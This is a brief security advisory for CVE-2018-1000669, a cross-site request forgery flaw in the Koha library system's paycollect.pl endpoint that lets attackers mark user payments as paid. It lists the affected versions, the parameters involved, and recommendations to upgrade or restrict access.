CVE-2018-1000669

Name of the Vulnerable Software and Affected Versions KOHA Library System versions 16.11.x through 16.11.13 KOHA Library System versions 17.05.x through 17.05.05

Description The issue allows attackers to mark payments as paid for certain users on behalf of administrators due to a Cross Site Request Forgery (CSRF) vulnerability in the /cgi-bin/koha/members/paycollect.pl API endpoint. The parameters affected are borrowernumber, amount, amountoutstanding, and paid. This attack is exploitable via social engineering, where the victim is tricked into clicking a link, usually via email.

Recommendations For KOHA Library System versions 16.11.x through 16.11.13, update to version 17.11 or later. For KOHA Library System versions 17.05.x through 17.05.05, update to version 17.11 or later. As a temporary workaround, consider restricting access to the /cgi-bin/koha/members/paycollect.pl API endpoint to minimize the risk of exploitation. Avoid using the parameters borrowernumber, amount, amountoutstanding, and paid in the affected API endpoint until the issue is resolved.